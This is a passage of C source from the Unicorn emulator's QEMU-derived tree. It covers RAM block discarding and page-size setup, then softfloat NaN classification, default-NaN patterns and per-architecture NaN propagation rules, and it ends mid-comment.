needs to deal with migration bitmaps etc to still be built * target independent. 
*/ size_t qemu_target_page_size(struct uc_struct *uc) { return TARGET_PAGE_SIZE; } int qemu_target_page_bits(struct uc_struct *uc) { return TARGET_PAGE_BITS; } int qemu_target_page_bits_min(void) { return TARGET_PAGE_BITS_MIN; } bool target_words_bigendian(void) { #if defined(TARGET_WORDS_BIGENDIAN) return true; #else return false; #endif } bool cpu_physical_memory_is_io(AddressSpace *as, hwaddr phys_addr) { MemoryRegion *mr; hwaddr l = 1; bool res; mr = address_space_translate(as, phys_addr, &phys_addr, &l, false, MEMTXATTRS_UNSPECIFIED); res = !memory_region_is_ram(mr); return res; } /* * Unmap pages of memory from start to start+length such that * they a) read as 0, b) trigger whatever fault mechanism * the OS provides for postcopy. * The pages must be unmapped by the end of the function. * Returns: 0 on success, non-0 on failure * */ int ram_block_discard_range(struct uc_struct *uc, RAMBlock *rb, uint64_t start, size_t length) { int ret = -1; uint8_t *host_startaddr = rb->host + start; if (!QEMU_PTR_IS_ALIGNED(host_startaddr, rb->page_size)) { //error_report("ram_block_discard_range: Unaligned start address: %p", // host_startaddr); goto err; } if ((start + length) <= rb->used_length) { bool need_madvise; if (!QEMU_IS_ALIGNED(length, rb->page_size)) { //error_report("ram_block_discard_range: Unaligned length: %zx", // length); goto err; } errno = ENOTSUP; /* If we are missing MADVISE etc */ /* The logic here is messy; * madvise DONTNEED fails for hugepages * fallocate works on hugepages and shmem */ need_madvise = (rb->page_size == uc->qemu_host_page_size); if (need_madvise) { /* For normal RAM this causes it to be unmapped, * for shared memory it causes the local mapping to disappear * and to fall back on the file contents (which we just * fallocate'd away).
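 * For anonymous mappings, pages read after MADV_DONTNEED come back
 * zero-filled, which is what satisfies requirement (a) in the function
 * comment above.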
*/ #if defined(CONFIG_MADVISE) ret = madvise(host_startaddr, length, MADV_DONTNEED); if (ret) { ret = -errno; //error_report("ram_block_discard_range: Failed to discard range " // "%s:%" PRIx64 " +%zx (%d)", // rb->idstr, start, length, ret); goto err; } #else ret = -ENOSYS; //error_report("ram_block_discard_range: MADVISE not available" // "%s:%" PRIx64 " +%zx (%d)", // rb->idstr, start, length, ret); goto err; #endif } } else { //error_report("ram_block_discard_range: Overrun block '%s' (%" PRIu64 // "/%zx/" RAM_ADDR_FMT")", // rb->idstr, start, length, rb->used_length); } err: return ret; } bool ramblock_is_pmem(RAMBlock *rb) { return rb->flags & RAM_PMEM; } void page_size_init(struct uc_struct *uc) { /* NOTE: we can always suppose that qemu_host_page_size >= TARGET_PAGE_SIZE */ if (uc->qemu_host_page_size == 0) { uc->qemu_host_page_size = uc->qemu_real_host_page_size; } if (uc->qemu_host_page_size < TARGET_PAGE_SIZE) { uc->qemu_host_page_size = TARGET_PAGE_SIZE; } }
unicorn-2.1.1/qemu/fpu/
unicorn-2.1.1/qemu/fpu/softfloat-specialize.inc.c
/* * QEMU float support * * The code in this source file is derived from release 2a of the SoftFloat * IEC/IEEE Floating-point Arithmetic Package. Those parts of the code (and * some later contributions) are provided under that license, as detailed below. * It has subsequently been modified by contributors to the QEMU Project, * so some portions are provided under: * the SoftFloat-2a license * the BSD license * GPL-v2-or-later * * Any future contributions to this file after December 1st 2014 will be * taken to be licensed under the Softfloat-2a license unless specifically * indicated otherwise. */ /* =============================================================================== This C source fragment is part of the SoftFloat IEC/IEEE Floating-point Arithmetic Package, Release 2a. Written by John R. Hauser. This work was made possible in part by the International Computer Science Institute, located at Suite 600, 1947 Center Street, Berkeley, California 94704. Funding was partially provided by the National Science Foundation under grant MIP-9311980.
The original version of this code was written as part of a project to build a fixed-point vector processor in collaboration with the University of California at Berkeley, overseen by Profs. Nelson Morgan and John Wawrzynek. More information is available through the Web page `http://HTTP.CS.Berkeley.EDU/~jhauser/ arithmetic/SoftFloat.html'. THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE. Although reasonable effort has been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT TIMES RESULT IN INCORRECT BEHAVIOR. USE OF THIS SOFTWARE IS RESTRICTED TO PERSONS AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ANY AND ALL LOSSES, COSTS, OR OTHER PROBLEMS ARISING FROM ITS USE. Derivative works are acceptable, even for commercial purposes, so long as (1) they include prominent notice that the work is derivative, and (2) they include prominent notice akin to these four paragraphs for those parts of this code that are retained. =============================================================================== */ /* BSD licensing: * Copyright (c) 2006, Fabrice Bellard * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * 3. Neither the name of the copyright holder nor the names of its contributors * may be used to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGE. */ /* Portions of this work are licensed under the terms of the GNU GPL, * version 2 or later. See the COPYING file in the top-level directory. */ /* Define for architectures which deviate from IEEE in not supporting * signaling NaNs (so all NaNs are treated as quiet). */ #if defined(TARGET_XTENSA) #define NO_SIGNALING_NANS 1 #endif /* Define how the architecture discriminates signaling NaNs. * This is done with the most significant bit of the fraction. * In IEEE 754-1985 this was implementation defined, but in IEEE 754-2008 * the msb must be zero. MIPS is (so far) unique in supporting both the * 2008 revision and backward compatibility with their original choice. * Thus for MIPS we must make the choice at runtime.
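 *
 * Example float32 bit patterns (illustrative): under the IEEE 754-2008
 * convention 0x7FC00000 is a quiet NaN (fraction msb set) and 0x7F800001
 * is a signaling NaN; with snan_bit_is_one the meaning of the fraction
 * msb is inverted.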
*/ static inline flag snan_bit_is_one(float_status *status) { #if defined(TARGET_MIPS) return status->snan_bit_is_one; #elif defined(TARGET_HPPA) || defined(TARGET_UNICORE32) || defined(TARGET_SH4) return 1; #else return 0; #endif } /*---------------------------------------------------------------------------- | For the deconstructed floating-point with fraction FRAC, return true | if the fraction represents a signalling NaN; otherwise false. *----------------------------------------------------------------------------*/ static bool parts_is_snan_frac(uint64_t frac, float_status *status) { #ifdef NO_SIGNALING_NANS return false; #else flag msb = extract64(frac, DECOMPOSED_BINARY_POINT - 1, 1); return msb == snan_bit_is_one(status); #endif } /*---------------------------------------------------------------------------- | The pattern for a default generated deconstructed floating-point NaN. *----------------------------------------------------------------------------*/ static FloatParts parts_default_nan(float_status *status) { bool sign = 0; uint64_t frac; #if defined(TARGET_SPARC) || defined(TARGET_M68K) /* !snan_bit_is_one, set all bits */ frac = (1ULL << DECOMPOSED_BINARY_POINT) - 1; #elif defined(TARGET_I386) || defined(TARGET_X86_64) \ || defined(TARGET_MICROBLAZE) /* !snan_bit_is_one, set sign and msb */ frac = 1ULL << (DECOMPOSED_BINARY_POINT - 1); sign = 1; #elif defined(TARGET_HPPA) /* snan_bit_is_one, set msb-1. */ frac = 1ULL << (DECOMPOSED_BINARY_POINT - 2); #else /* This case is true for Alpha, ARM, MIPS, OpenRISC, PPC, RISC-V, * S390, SH4, TriCore, and Xtensa. I cannot find documentation * for Unicore32; the choice from the original commit is unchanged. * Our other supported targets, CRIS, LM32, Moxie, Nios2, and Tile, * do not have floating-point. */ if (snan_bit_is_one(status)) { /* set all bits other than msb */ frac = (1ULL << (DECOMPOSED_BINARY_POINT - 1)) - 1; } else { /* set msb */ frac = 1ULL << (DECOMPOSED_BINARY_POINT - 1); } #endif return (FloatParts) { .cls = float_class_qnan, .sign = sign, .exp = INT_MAX, .frac = frac }; } /*---------------------------------------------------------------------------- | Returns a quiet NaN from a signalling NaN for the deconstructed | floating-point parts. *----------------------------------------------------------------------------*/ static FloatParts parts_silence_nan(FloatParts a, float_status *status) { #ifdef NO_SIGNALING_NANS g_assert_not_reached(); #elif defined(TARGET_HPPA) a.frac &= ~(1ULL << (DECOMPOSED_BINARY_POINT - 1)); a.frac |= 1ULL << (DECOMPOSED_BINARY_POINT - 2); #else if (snan_bit_is_one(status)) { return parts_default_nan(status); } else { a.frac |= 1ULL << (DECOMPOSED_BINARY_POINT - 1); } #endif a.cls = float_class_qnan; return a; } /*---------------------------------------------------------------------------- | The pattern for a default generated extended double-precision NaN. *----------------------------------------------------------------------------*/ floatx80 floatx80_default_nan(float_status *status) { floatx80 r; /* None of the targets that have snan_bit_is_one use floatx80. */ assert(!snan_bit_is_one(status)); #if defined(TARGET_M68K) r.low = UINT64_C(0xFFFFFFFFFFFFFFFF); r.high = 0x7FFF; #else /* X86 */ r.low = UINT64_C(0xC000000000000000); r.high = 0xFFFF; #endif return r; } /*---------------------------------------------------------------------------- | The pattern for a default generated extended double-precision inf. 
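| (The x86 pattern below keeps the explicit integer bit set with a zero
| fraction, as the x87 format requires for infinity; m68k instead uses an
| all-zero significand.)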
*----------------------------------------------------------------------------*/ #define floatx80_infinity_high 0x7FFF #if defined(TARGET_M68K) #define floatx80_infinity_low UINT64_C(0x0000000000000000) #else #define floatx80_infinity_low UINT64_C(0x8000000000000000) #endif const floatx80 floatx80_infinity = make_floatx80_init(floatx80_infinity_high, floatx80_infinity_low); /*---------------------------------------------------------------------------- | Raises the exceptions specified by `flags'. Floating-point traps can be | defined here if desired. It is currently not possible for such a trap | to substitute a result value. If traps are not implemented, this routine | should be simply `float_exception_flags |= flags;'. *----------------------------------------------------------------------------*/ void float_raise(uint8_t flags, float_status *status) { status->float_exception_flags |= flags; } /*---------------------------------------------------------------------------- | Internal canonical NaN format. *----------------------------------------------------------------------------*/ typedef struct { flag sign; uint64_t high, low; } commonNaNT; /*---------------------------------------------------------------------------- | Returns 1 if the half-precision floating-point value `a' is a quiet | NaN; otherwise returns 0. *----------------------------------------------------------------------------*/ int float16_is_quiet_nan(float16 a_, float_status *status) { #ifdef NO_SIGNALING_NANS return float16_is_any_nan(a_); #else uint16_t a = float16_val(a_); if (snan_bit_is_one(status)) { return (((a >> 9) & 0x3F) == 0x3E) && (a & 0x1FF); } else { return ((a & ~0x8000) >= 0x7C80); } #endif } /*---------------------------------------------------------------------------- | Returns 1 if the half-precision floating-point value `a' is a signaling | NaN; otherwise returns 0. *----------------------------------------------------------------------------*/ int float16_is_signaling_nan(float16 a_, float_status *status) { #ifdef NO_SIGNALING_NANS return 0; #else uint16_t a = float16_val(a_); if (snan_bit_is_one(status)) { return ((a & ~0x8000) >= 0x7C80); } else { return (((a >> 9) & 0x3F) == 0x3E) && (a & 0x1FF); } #endif } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point value `a' is a quiet | NaN; otherwise returns 0. *----------------------------------------------------------------------------*/ int float32_is_quiet_nan(float32 a_, float_status *status) { #ifdef NO_SIGNALING_NANS return float32_is_any_nan(a_); #else uint32_t a = float32_val(a_); if (snan_bit_is_one(status)) { return (((a >> 22) & 0x1FF) == 0x1FE) && (a & 0x003FFFFF); } else { return ((uint32_t)(a << 1) >= 0xFF800000); } #endif } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point value `a' is a signaling | NaN; otherwise returns 0. *----------------------------------------------------------------------------*/ int float32_is_signaling_nan(float32 a_, float_status *status) { #ifdef NO_SIGNALING_NANS return 0; #else uint32_t a = float32_val(a_); if (snan_bit_is_one(status)) { return ((uint32_t)(a << 1) >= 0xFF800000); } else { return (((a >> 22) & 0x1FF) == 0x1FE) && (a & 0x003FFFFF); } #endif } /*---------------------------------------------------------------------------- | Returns the result of converting the single-precision floating-point NaN | `a' to the canonical NaN format. 
If `a' is a signaling NaN, the invalid | exception is raised. *----------------------------------------------------------------------------*/ static commonNaNT float32ToCommonNaN(float32 a, float_status *status) { commonNaNT z; if (float32_is_signaling_nan(a, status)) { float_raise(float_flag_invalid, status); } z.sign = float32_val(a) >> 31; z.low = 0; z.high = ((uint64_t)float32_val(a)) << 41; return z; } /*---------------------------------------------------------------------------- | Returns the result of converting the canonical NaN `a' to the single- | precision floating-point format. *----------------------------------------------------------------------------*/ static float32 commonNaNToFloat32(commonNaNT a, float_status *status) { uint32_t mantissa = a.high >> 41; if (status->default_nan_mode) { return float32_default_nan(status); } if (mantissa) { return make_float32( (((uint32_t)a.sign) << 31) | 0x7F800000 | (a.high >> 41)); } else { return float32_default_nan(status); } } /*---------------------------------------------------------------------------- | Select which NaN to propagate for a two-input operation. | IEEE754 doesn't specify all the details of this, so the | algorithm is target-specific. | The routine is passed various bits of information about the | two NaNs and should return 0 to select NaN a and 1 for NaN b. | Note that signalling NaNs are always squashed to quiet NaNs | by the caller, by calling floatXX_silence_nan() before | returning them. | | aIsLargerSignificand is only valid if both a and b are NaNs | of some kind, and is true if a has the larger significand, | or if both a and b have the same significand but a is | positive and b is negative. It is only needed for the x87 | tie-break rule. *----------------------------------------------------------------------------*/ static int pickNaN(FloatClass a_cls, FloatClass b_cls, flag aIsLargerSignificand) { #if defined(TARGET_ARM) || defined(TARGET_MIPS) || defined(TARGET_HPPA) /* ARM mandated NaN propagation rules (see FPProcessNaNs()), take * the first of: * 1. A if it is signaling * 2. B if it is signaling * 3. A (quiet) * 4. B (quiet) * A signaling NaN is always quietened before returning it. */ /* According to MIPS specifications, if one of the two operands is * an sNaN, a new qNaN has to be generated. This is done in * floatXX_silence_nan(). For qNaN inputs the specification * says: "When possible, this QNaN result is one of the operand QNaN * values." In practice it seems that most implementations choose * the first operand if both operands are qNaN. In short this gives * the following rules: * 1. A if it is signaling * 2. B if it is signaling * 3. A (quiet) * 4. B (quiet) * A signaling NaN is always silenced before returning it. */ if (is_snan(a_cls)) { return 0; } else if (is_snan(b_cls)) { return 1; } else if (is_qnan(a_cls)) { return 0; } else { return 1; } #elif defined(TARGET_PPC) || defined(TARGET_XTENSA) || defined(TARGET_M68K) /* PowerPC propagation rules: * 1. A if it is an sNaN or qNaN * 2. B if it is an sNaN or qNaN * A signaling NaN is always silenced before returning it. */ /* M68000 FAMILY PROGRAMMER'S REFERENCE MANUAL * 3.4 FLOATING-POINT INSTRUCTION DETAILS * If either operand, but not both operands, of an operation is a * nonsignaling NaN, then that NaN is returned as the result. If both * operands are nonsignaling NaNs, then the destination operand * nonsignaling NaN is returned as the result. * If either operand to an operation is a signaling NaN (SNaN), then the * SNaN bit is set in the FPSR EXC byte.
If the SNaN exception enable bit * is set in the FPCR ENABLE byte, then the exception is taken and the * destination is not modified. If the SNaN exception enable bit is not * set, setting the SNaN bit in the operand to a one converts the SNaN to * a nonsignaling NaN. The operation then continues as described in the * preceding paragraph for nonsignaling NaNs. */ if (is_nan(a_cls)) { return 0; } else { return 1; } #else /* This implements x87 NaN propagation rules: * SNaN + QNaN => return the QNaN * two SNaNs => return the one with the larger significand, silenced * two QNaNs => return the one with the larger significand * SNaN and a non-NaN => return the SNaN, silenced * QNaN and a non-NaN => return the QNaN * * If we get down to comparing significands and they are the same, * return the NaN with the positive sign bit (if any). */ if (is_snan(a_cls)) { if (is_snan(b_cls)) { return aIsLargerSignificand ? 0 : 1; } return is_qnan(b_cls) ? 1 : 0; } else if (is_qnan(a_cls)) { if (is_snan(b_cls) || !is_qnan(b_cls)) { return 0; } else { return aIsLargerSignificand ? 0 : 1; } } else { return 1; } #endif } /*---------------------------------------------------------------------------- | Select which NaN to propagate for a three-input operation. | For the moment we assume that no CPU needs the 'larger significand' | information. | Return values : 0 : a; 1 : b; 2 : c; 3 : default-NaN *----------------------------------------------------------------------------*/ static int pickNaNMulAdd(FloatClass a_cls, FloatClass b_cls, FloatClass c_cls, bool infzero, float_status *status) { #if defined(TARGET_ARM) /* For ARM, the (inf,zero,qnan) case sets InvalidOp and returns * the default NaN */ if (infzero && is_qnan(c_cls)) { float_raise(float_flag_invalid, status); return 3; } /* This looks different from the ARM ARM pseudocode, because the ARM ARM * puts the operands to a fused mac operation (a*b)+c in the order c,a,b. */ if (is_snan(c_cls)) { return 2; } else if (is_snan(a_cls)) { return 0; } else if (is_snan(b_cls)) { return 1; } else if (is_qnan(c_cls)) { return 2; } else if (is_qnan(a_cls)) { return 0; } else { return 1; } #elif defined(TARGET_MIPS) if (snan_bit_is_one(status)) { /* * For MIPS systems that conform to IEEE754-1985, the (inf,zero,nan) * case sets InvalidOp and returns the default NaN */ if (infzero) { float_raise(float_flag_invalid, status); return 3; } /* Prefer sNaN over qNaN, in the a, b, c order. */ if (is_snan(a_cls)) { return 0; } else if (is_snan(b_cls)) { return 1; } else if (is_snan(c_cls)) { return 2; } else if (is_qnan(a_cls)) { return 0; } else if (is_qnan(b_cls)) { return 1; } else { return 2; } } else { /* * For MIPS systems that conform to IEEE754-2008, the (inf,zero,nan) * case sets InvalidOp and returns the input value 'c' */ if (infzero) { float_raise(float_flag_invalid, status); return 2; } /* Prefer sNaN over qNaN, in the c, a, b order. */ if (is_snan(c_cls)) { return 2; } else if (is_snan(a_cls)) { return 0; } else if (is_snan(b_cls)) { return 1; } else if (is_qnan(c_cls)) { return 2; } else if (is_qnan(a_cls)) { return 0; } else { return 1; } } #elif defined(TARGET_PPC) /* For PPC, the (inf,zero,qnan) case sets InvalidOp, but we prefer * to return an input NaN if we have one (ie c) rather than generating * a default NaN */ if (infzero) { float_raise(float_flag_invalid, status); return 2; } /* If fRA is a NaN return it; otherwise if fRB is a NaN return it; * otherwise return fRC. 
Note that muladd on PPC is (fRA * fRC) + frB */ if (is_nan(a_cls)) { return 0; } else if (is_nan(c_cls)) { return 2; } else { return 1; } #else /* A default implementation: prefer a to b to c. * This is unlikely to actually match any real implementation. */ if (is_nan(a_cls)) { return 0; } else if (is_nan(b_cls)) { return 1; } else { return 2; } #endif } /*---------------------------------------------------------------------------- | Takes two single-precision floating-point values `a' and `b', one of which | is a NaN, and returns the appropriate NaN result. If either `a' or `b' is a | signaling NaN, the invalid exception is raised. *----------------------------------------------------------------------------*/ static float32 propagateFloat32NaN(float32 a, float32 b, float_status *status) { flag aIsLargerSignificand; uint32_t av, bv; FloatClass a_cls, b_cls; /* This is not complete, but is good enough for pickNaN. */ a_cls = (!float32_is_any_nan(a) ? float_class_normal : float32_is_signaling_nan(a, status) ? float_class_snan : float_class_qnan); b_cls = (!float32_is_any_nan(b) ? float_class_normal : float32_is_signaling_nan(b, status) ? float_class_snan : float_class_qnan); av = float32_val(a); bv = float32_val(b); if (is_snan(a_cls) || is_snan(b_cls)) { float_raise(float_flag_invalid, status); } if (status->default_nan_mode) { return float32_default_nan(status); } if ((uint32_t)(av << 1) < (uint32_t)(bv << 1)) { aIsLargerSignificand = 0; } else if ((uint32_t)(bv << 1) < (uint32_t)(av << 1)) { aIsLargerSignificand = 1; } else { aIsLargerSignificand = (av < bv) ? 1 : 0; } if (pickNaN(a_cls, b_cls, aIsLargerSignificand)) { if (is_snan(b_cls)) { return float32_silence_nan(b, status); } return b; } else { if (is_snan(a_cls)) { return float32_silence_nan(a, status); } return a; } } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point value `a' is a quiet | NaN; otherwise returns 0. *----------------------------------------------------------------------------*/ int float64_is_quiet_nan(float64 a_, float_status *status) { #ifdef NO_SIGNALING_NANS return float64_is_any_nan(a_); #else uint64_t a = float64_val(a_); if (snan_bit_is_one(status)) { return (((a >> 51) & 0xFFF) == 0xFFE) && (a & 0x0007FFFFFFFFFFFFULL); } else { return ((a << 1) >= 0xFFF0000000000000ULL); } #endif } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point value `a' is a signaling | NaN; otherwise returns 0. *----------------------------------------------------------------------------*/ int float64_is_signaling_nan(float64 a_, float_status *status) { #ifdef NO_SIGNALING_NANS return 0; #else uint64_t a = float64_val(a_); if (snan_bit_is_one(status)) { return ((a << 1) >= 0xFFF0000000000000ULL); } else { return (((a >> 51) & 0xFFF) == 0xFFE) && (a & UINT64_C(0x0007FFFFFFFFFFFF)); } #endif } /*---------------------------------------------------------------------------- | Returns the result of converting the double-precision floating-point NaN | `a' to the canonical NaN format. If `a' is a signaling NaN, the invalid | exception is raised. 
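| (The canonical form left-justifies the payload: the 52 fraction bits of
| a float64 end up at the top of the `high' field, hence the `<< 12' in
| the conversion below.)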
*----------------------------------------------------------------------------*/ static commonNaNT float64ToCommonNaN(float64 a, float_status *status) { commonNaNT z; if (float64_is_signaling_nan(a, status)) { float_raise(float_flag_invalid, status); } z.sign = float64_val(a) >> 63; z.low = 0; z.high = float64_val(a) << 12; return z; } /*---------------------------------------------------------------------------- | Returns the result of converting the canonical NaN `a' to the double- | precision floating-point format. *----------------------------------------------------------------------------*/ static float64 commonNaNToFloat64(commonNaNT a, float_status *status) { uint64_t mantissa = a.high >> 12; if (status->default_nan_mode) { return float64_default_nan(status); } if (mantissa) { return make_float64( (((uint64_t) a.sign) << 63) | UINT64_C(0x7FF0000000000000) | (a.high >> 12)); } else { return float64_default_nan(status); } } /*---------------------------------------------------------------------------- | Takes two double-precision floating-point values `a' and `b', one of which | is a NaN, and returns the appropriate NaN result. If either `a' or `b' is a | signaling NaN, the invalid exception is raised. *----------------------------------------------------------------------------*/ static float64 propagateFloat64NaN(float64 a, float64 b, float_status *status) { flag aIsLargerSignificand; uint64_t av, bv; FloatClass a_cls, b_cls; /* This is not complete, but is good enough for pickNaN. */ a_cls = (!float64_is_any_nan(a) ? float_class_normal : float64_is_signaling_nan(a, status) ? float_class_snan : float_class_qnan); b_cls = (!float64_is_any_nan(b) ? float_class_normal : float64_is_signaling_nan(b, status) ? float_class_snan : float_class_qnan); av = float64_val(a); bv = float64_val(b); if (is_snan(a_cls) || is_snan(b_cls)) { float_raise(float_flag_invalid, status); } if (status->default_nan_mode) { return float64_default_nan(status); } if ((uint64_t)(av << 1) < (uint64_t)(bv << 1)) { aIsLargerSignificand = 0; } else if ((uint64_t)(bv << 1) < (uint64_t)(av << 1)) { aIsLargerSignificand = 1; } else { aIsLargerSignificand = (av < bv) ? 1 : 0; } if (pickNaN(a_cls, b_cls, aIsLargerSignificand)) { if (is_snan(b_cls)) { return float64_silence_nan(b, status); } return b; } else { if (is_snan(a_cls)) { return float64_silence_nan(a, status); } return a; } } /*---------------------------------------------------------------------------- | Returns 1 if the extended double-precision floating-point value `a' is a | quiet NaN; otherwise returns 0. This slightly differs from the same | function for other types as floatx80 has an explicit bit. *----------------------------------------------------------------------------*/ int floatx80_is_quiet_nan(floatx80 a, float_status *status) { #ifdef NO_SIGNALING_NANS return floatx80_is_any_nan(a); #else if (snan_bit_is_one(status)) { uint64_t aLow; aLow = a.low & ~0x4000000000000000ULL; return ((a.high & 0x7FFF) == 0x7FFF) && (aLow << 1) && (a.low == aLow); } else { return ((a.high & 0x7FFF) == 0x7FFF) && (UINT64_C(0x8000000000000000) <= ((uint64_t)(a.low << 1))); } #endif } /*---------------------------------------------------------------------------- | Returns 1 if the extended double-precision floating-point value `a' is a | signaling NaN; otherwise returns 0. This slightly differs from the same | function for other types as floatx80 has an explicit bit. 
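| For example, with snan_bit_is_one clear, high = 0x7FFF and
| low = 0x8000000000000001 is a signaling NaN: the explicit integer bit
| (bit 63) is set, the quiet bit (bit 62) is clear, and the remaining
| fraction bits are non-zero. (Worked example added for illustration.)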
*----------------------------------------------------------------------------*/ int floatx80_is_signaling_nan(floatx80 a, float_status *status) { #ifdef NO_SIGNALING_NANS return 0; #else if (snan_bit_is_one(status)) { return ((a.high & 0x7FFF) == 0x7FFF) && ((a.low << 1) >= 0x8000000000000000ULL); } else { uint64_t aLow; aLow = a.low & ~UINT64_C(0x4000000000000000); return ((a.high & 0x7FFF) == 0x7FFF) && (uint64_t)(aLow << 1) && (a.low == aLow); } #endif } /*---------------------------------------------------------------------------- | Returns a quiet NaN from a signalling NaN for the extended double-precision | floating point value `a'. *----------------------------------------------------------------------------*/ floatx80 floatx80_silence_nan(floatx80 a, float_status *status) { /* None of the targets that have snan_bit_is_one use floatx80. */ assert(!snan_bit_is_one(status)); a.low |= UINT64_C(0xC000000000000000); return a; } /*---------------------------------------------------------------------------- | Returns the result of converting the extended double-precision floating- | point NaN `a' to the canonical NaN format. If `a' is a signaling NaN, the | invalid exception is raised. *----------------------------------------------------------------------------*/ static commonNaNT floatx80ToCommonNaN(floatx80 a, float_status *status) { floatx80 dflt; commonNaNT z; if (floatx80_is_signaling_nan(a, status)) { float_raise(float_flag_invalid, status); } if (a.low >> 63) { z.sign = a.high >> 15; z.low = 0; z.high = a.low << 1; } else { dflt = floatx80_default_nan(status); z.sign = dflt.high >> 15; z.low = 0; z.high = dflt.low << 1; } return z; } /*---------------------------------------------------------------------------- | Returns the result of converting the canonical NaN `a' to the extended | double-precision floating-point format. *----------------------------------------------------------------------------*/ static floatx80 commonNaNToFloatx80(commonNaNT a, float_status *status) { floatx80 z; if (status->default_nan_mode) { return floatx80_default_nan(status); } if (a.high >> 1) { z.low = UINT64_C(0x8000000000000000) | a.high >> 1; z.high = (((uint16_t)a.sign) << 15) | 0x7FFF; } else { z = floatx80_default_nan(status); } return z; } /*---------------------------------------------------------------------------- | Takes two extended double-precision floating-point values `a' and `b', one | of which is a NaN, and returns the appropriate NaN result. If either `a' or | `b' is a signaling NaN, the invalid exception is raised. *----------------------------------------------------------------------------*/ floatx80 propagateFloatx80NaN(floatx80 a, floatx80 b, float_status *status) { flag aIsLargerSignificand; FloatClass a_cls, b_cls; /* This is not complete, but is good enough for pickNaN. */ a_cls = (!floatx80_is_any_nan(a) ? float_class_normal : floatx80_is_signaling_nan(a, status) ? float_class_snan : float_class_qnan); b_cls = (!floatx80_is_any_nan(b) ? float_class_normal : floatx80_is_signaling_nan(b, status) ? float_class_snan : float_class_qnan); if (is_snan(a_cls) || is_snan(b_cls)) { float_raise(float_flag_invalid, status); } if (status->default_nan_mode) { return floatx80_default_nan(status); } if (a.low < b.low) { aIsLargerSignificand = 0; } else if (b.low < a.low) { aIsLargerSignificand = 1; } else { aIsLargerSignificand = (a.high < b.high) ? 
1 : 0; } if (pickNaN(a_cls, b_cls, aIsLargerSignificand)) { if (is_snan(b_cls)) { return floatx80_silence_nan(b, status); } return b; } else { if (is_snan(a_cls)) { return floatx80_silence_nan(a, status); } return a; } } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point value `a' is a quiet | NaN; otherwise returns 0. *----------------------------------------------------------------------------*/ int float128_is_quiet_nan(float128 a, float_status *status) { #ifdef NO_SIGNALING_NANS return float128_is_any_nan(a); #else if (snan_bit_is_one(status)) { return (((a.high >> 47) & 0xFFFF) == 0xFFFE) && (a.low || (a.high & 0x00007FFFFFFFFFFFULL)); } else { return ((a.high << 1) >= 0xFFFF000000000000ULL) && (a.low || (a.high & 0x0000FFFFFFFFFFFFULL)); } #endif } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point value `a' is a | signaling NaN; otherwise returns 0. *----------------------------------------------------------------------------*/ int float128_is_signaling_nan(float128 a, float_status *status) { #ifdef NO_SIGNALING_NANS return 0; #else if (snan_bit_is_one(status)) { return ((a.high << 1) >= 0xFFFF000000000000ULL) && (a.low || (a.high & 0x0000FFFFFFFFFFFFULL)); } else { return (((a.high >> 47) & 0xFFFF) == 0xFFFE) && (a.low || (a.high & UINT64_C(0x00007FFFFFFFFFFF))); } #endif } /*---------------------------------------------------------------------------- | Returns a quiet NaN from a signalling NaN for the quadruple-precision | floating point value `a'. *----------------------------------------------------------------------------*/ float128 float128_silence_nan(float128 a, float_status *status) { #ifdef NO_SIGNALING_NANS g_assert_not_reached(); #else if (snan_bit_is_one(status)) { return float128_default_nan(status); } else { a.high |= UINT64_C(0x0000800000000000); return a; } #endif } /*---------------------------------------------------------------------------- | Returns the result of converting the quadruple-precision floating-point NaN | `a' to the canonical NaN format. If `a' is a signaling NaN, the invalid | exception is raised. *----------------------------------------------------------------------------*/ static commonNaNT float128ToCommonNaN(float128 a, float_status *status) { commonNaNT z; if (float128_is_signaling_nan(a, status)) { float_raise(float_flag_invalid, status); } z.sign = a.high >> 63; shortShift128Left(a.high, a.low, 16, &z.high, &z.low); return z; } /*---------------------------------------------------------------------------- | Returns the result of converting the canonical NaN `a' to the quadruple- | precision floating-point format. *----------------------------------------------------------------------------*/ static float128 commonNaNToFloat128(commonNaNT a, float_status *status) { float128 z; if (status->default_nan_mode) { return float128_default_nan(status); } shift128Right(a.high, a.low, 16, &z.high, &z.low); z.high |= (((uint64_t)a.sign) << 63) | UINT64_C(0x7FFF000000000000); return z; } /*---------------------------------------------------------------------------- | Takes two quadruple-precision floating-point values `a' and `b', one of | which is a NaN, and returns the appropriate NaN result. If either `a' or | `b' is a signaling NaN, the invalid exception is raised. 
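| (Illustrative example: if the chosen NaN is the signaling NaN
| high = 0x7FFF000000000000, low = 0x1, and snan_bit_is_one is clear, it is
| returned quieted by float128_silence_nan above as
| high = 0x7FFF800000000000, low = 0x1.)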
